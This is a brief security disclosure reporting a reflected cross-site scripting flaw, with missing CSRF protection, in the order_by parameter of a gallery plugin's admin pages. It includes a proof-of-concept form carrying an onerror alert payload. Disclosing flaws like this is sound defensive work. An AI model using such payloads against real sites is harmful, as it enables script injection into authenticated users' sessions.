Hello,
1. Reflected Cross-Site Scripting (XSS)
Authenticated users (like editors) can inject html/js code (there is no CSRF protection).
Method: POST
Vulnerable parameters: order_by
Example PHP callstack:
showgallery [/gallery-images/admin/gallery_func.php:67]
html_showgallerys [/gallery-images/admin/gallery_view.php:186]
Verification:
--
<input type="text" name="order_by" value='"><img src=x onerror=alert(1) />' />
<input type="submit" />
</form>
--
--
Regards,
Marcin Probola,